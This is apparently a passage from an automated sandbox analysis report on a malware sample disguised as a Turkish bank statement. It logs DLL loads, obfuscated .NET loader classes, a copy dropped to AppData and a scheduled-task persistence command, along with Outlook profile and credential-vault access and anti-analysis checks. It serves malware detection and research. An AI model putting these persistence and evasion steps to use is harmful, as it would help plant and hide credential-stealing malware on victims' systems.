                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder  Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: hesaphareketi-.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: hesaphareketi-.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, F20LWFVHgRjD1hgb3j.cs  .Net Code: dWUJRPvyRJ System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Code function: 8_2_066EA930 push es; ret 8_2_066EA940
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Code function: 13_2_069419A5 push es; ret 13_2_069419AC
                    Source: hesaphareketi-.exe  Static PE information: section name: .text entropy: 7.973890761853698
                    Source: xyodEPhulIrkY.exe.0.dr  Static PE information: section name: .text entropy: 7.973890761853698
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, JLe6m0JVI7W98w4t5s.cs  High entropy of concatenated method names: 'PXMgSOmyU1', 'dDHgV9qSUK', 'YJwgwIWl92', 'TsRgC3uxVb', 'KPmgDhcLbF', 'O1bg06BNis', 'dDl4smuF3lN21RQpPj', 'vrayaa7YShP4xcfceg', 'HBQggr60nq', 'OnFgYTVAx0'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, BAqdu2tZUYWeAgev1s.cs  High entropy of concatenated method names: 'WF1bwrkdPq', 'xyLbCjOexI', 'ToString', 'YMDbcYayuk', 'icwbd7Z1Zt', 'pkabxhbH2E', 'BIJbhvG94g', 'Nx7biU5YLL', 'yarbSI2Aft', 'HsCbVHjjy2'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, AVkm8InX6lcvvv10tM.cs  High entropy of concatenated method names: 'GHiq7UeFbc', 'dWJqZAMUaB', 'xkqqIp8eVw', 'Rk3qefO1je', 'xLRqHHK9Wt', 'q3sq1YeIEg', 'YHnqF1QRTs', 'SoSqKBvuM7', 'XVwqsALhiK', 'DgUqyHHPn0'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, LYkbs8FO0PYvEPcgSo.cs  High entropy of concatenated method names: 'kZqScrhmBR', 'gLBSxaYSfp', 'QfQSipvcY2', 'wdTiPtCRWO', 'k45izIIsvC', 'HDRSfDZSa6', 'o3qSgDnllw', 'zwuSrjrZcP', 'zc6SYYRNwr', 'lhtSJJlJJK'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, g1TRgK3U5nRcEG5wUg.cs  High entropy of concatenated method names: 'EZMSpPwt5n', 'mc9SmaNNDu', 'uvwSR66VSs', 'jNlSWUjERF', 'RPMSa6lAI7', 'O2xSAu3k1f', 'TdtSu7O6c2', 'agxS7DqMAT', 'eGOSZjX9ZD', 'U6GSjUJdZp'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, zHTY2RXOZnp6HaMgIa.cs  High entropy of concatenated method names: 'c0MbvhLfYY', 'MimbPuQRYL', 'IGU2frawt1', 'L0c2gMEEY7', 'xl8byHT96w', 'ObnbToxW0J', 'sS3bnjvKSV', 'FgYb43j7r4', 'XDnbOwi0c6', 'm38bN6bRFl'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, Lysk8PZJwIWl92tsR3.cs  High entropy of concatenated method names: 'AVcxWW4DlC', 'eQ6xAi4V0N', 'hFnx7TuVQN', 'rHyxZ2dtCB', 'Vw0xDK33DV', 'pk7x0I8j34', 'yp0xbGV69J', 'Pklx2lpAsl', 'UBFxMiNHs7', 'FKFx8EBFxu'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, I8gbKBPIFsh7sO6RDp.cs  High entropy of concatenated method names: 'kP7MgpYflT', 'X13MYsUUas', 'T8HMJUZlyS', 'NZHMcey9ZT', 'QgTMd4X2q8', 'tuKMhP2AOe', 'xmbMiTkEID', 'zZQ2kt8u1K', 'VAQ2vZbuiZ', 'HFu2LEg9rd'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, XbFy1bI6BNisxcL8lJ.cs  High entropy of concatenated method names: 'OrxiBcTmBU', 'QFFidqEysC', 'm42ihPpnrq', 'bUWiS34Zv8', 'moHiVmEqQH', 'gsThGwg64L', 'jbhhXPV6yn', 'q52hkG279D', 'WPphvP3k08', 'YJahLpmW72'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, qtZqvMdjbJfMeWP9dC.cs  High entropy of concatenated method names: 'Dispose', 's3ngLbNeIS', 'X4Rrer01tf', 'rA544trITb', 'ym1gPANpgl', 'JvegzpJfdm', 'ProcessDialogKey', 'B9prftc3hw', 'CwErgXgGVy', 'oamrrH8gbK'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, MG927nNEE6QY8Nd6uS.cs  High entropy of concatenated method names: 'ToString', 'XN00yqbCJB', 'FO10exQXiC', 'CN80Uy6JKX', 'gH80Hoe7L6', 'uN201Mq4VK', 'sji09RBgYw', 'CvD0F0ynkm', 'MM40K2L3fI', 'q8L03QqxVL'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, y1ANpgvl1vepJfdmA9.cs  High entropy of concatenated method names: 'b3n2cSEdPR', 'uMl2d3JBia', 'WnI2xxT7fF', 'C1M2hJZ7yP', 'KfM2iHvU3b', 'jkL2SUV73S', 'IS72VpJuho', 'aKP2Q6bPwy', 'Klm2wXbuGe', 'Ly02C77G8A'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, xtc3hwLAwEXgGVyDam.cs  High entropy of concatenated method names: 'D0L2Ic9M4M', 'nO62eNoJKR', 'KOW2UsuMrB', 'yvi2HgxQW6', 'XxQ24BoHbK', 'rsP21ecSno', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, NPeksFgYcSe8B0FI7oE.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DcR84JCfHT', 'MdF8O2jXpP', 'lZ88N7Q2gp', 'Ky98tbgguA', 'WRR8Gfmj4A', 'Iw78XqXRRx', 'dUZ8kNBcHk'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, rOmyU17JDH9qSUKV5w.cs  High entropy of concatenated method names: 'LG9d4IrvbV', 'MfjdOTsLec', 'QANdNOIyIT', 'PL1dtBgkr9', 'MUvdGUE8s6', 'CdbdX91MIE', 'aLZdkdd49k', 'qQmdvBjdc2', 't5gdLgJJIW', 'XppdPvgExy'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, F20LWFVHgRjD1hgb3j.cs  High entropy of concatenated method names: 'Ae3YBFmYd6', 'IuRYcHTyT1', 'O3CYdrZUnh', 'C9TYxQ4N48', 'ztpYhNrgo8', 'lG9YiR2a3j', 'edSYSw21Jw', 'SCPYVh4ib5', 'y7lYQEORvW', 'b2rYwb5jLa'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, zx1knCgfXJiQfOm40s6.cs  High entropy of concatenated method names: 'lkZMp8iMTg', 'Ie0MmwVNey', 'npdMREGQuI', 'nJEMWk1Vdi', 'JJeMacHOaq', 'zJUMAp0Nm9', 'NlRMueGpP0', 'Mp0M7DSIU7', 'OyrMZqaK45', 'SWwMjMS83r'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, BdQBg9ggM9qnIQ52I06.cs  High entropy of concatenated method names: 'ToString', 'B1L8YjmywZ', 'v7O8JhH6qp', 'ex48BWtMAi', 'mKp8cmeN8T', 'xR38dAMPen', 'HmF8xYSQZb', 'Ya78hIoIo0', 'BfFxpqykgqtGrv9WZvP', 'hRVDdJyOtCGiaBlnYqh'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, aDT2cHrHXfmMo3lhFr.cs  High entropy of concatenated method names: 'ucBRKxGSW', 'FN6WGgKEL', 'kKBA0Mfrx', 'QCcuoiXAg', 'XvKZulCV4', 'r12jcqDhd', 'rDLsumnqn0dKgkyuhO', 'FKCsAvFmFANxlJVcMu', 'xGX2vjExD', 'O7k8iop5s'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, DxVbtJjpm1602FPmhc.cs  High entropy of concatenated method names: 'fANhafQ3my', 'IRQhu3q84D', 'wtkxUiPEFl', 'gNJxHDbZIs', 'qAsx1Gx2BA', 'gCAx9Noi4S', 'QatxFuMhHv', 'ttrxKXOifW', 'SFBx3dCUqn', 'cT6xsSChpV'
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  File created: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe    Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: hesaphareketi-.exe PID: 6516, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: xyodEPhulIrkY.exe PID: 2828, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 2250000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 23E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 43E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 61E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 71E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 7340000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 8340000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 1700000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 3000000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: 5000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe Memory allocated: B20000 memory reserve | memory write watch
